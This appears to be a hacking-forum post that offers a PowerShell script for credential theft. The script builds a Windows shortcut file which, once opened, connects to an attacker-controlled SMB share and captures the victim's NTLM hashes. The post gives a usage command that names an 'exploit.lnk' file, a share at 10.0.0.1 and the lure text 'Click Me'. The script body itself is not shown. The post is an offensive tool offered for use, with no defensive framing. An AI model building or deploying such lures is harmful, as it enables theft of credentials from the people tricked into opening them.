dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,860
- Solutions
- 4
- Reputation
- 27
- Reaction score
- 45,546
- Points
- 1,813
- Credits
- 55,340
7 Years of Service
56%
Creates an LNK file that triggers an SMB connection to capture NTLM hashes. Requires PowerShell 7 or later due to the use of Array.Fill and .NET 6+ features.
Syntax
Script
Syntax
Code:
Create-SMBHashLeakLnk -LnkFilePath "C:\Temp\exploit.lnk" -SmbSharePath "\\10.0.0.1\share\fake.exe" -Description "Click Me"
Script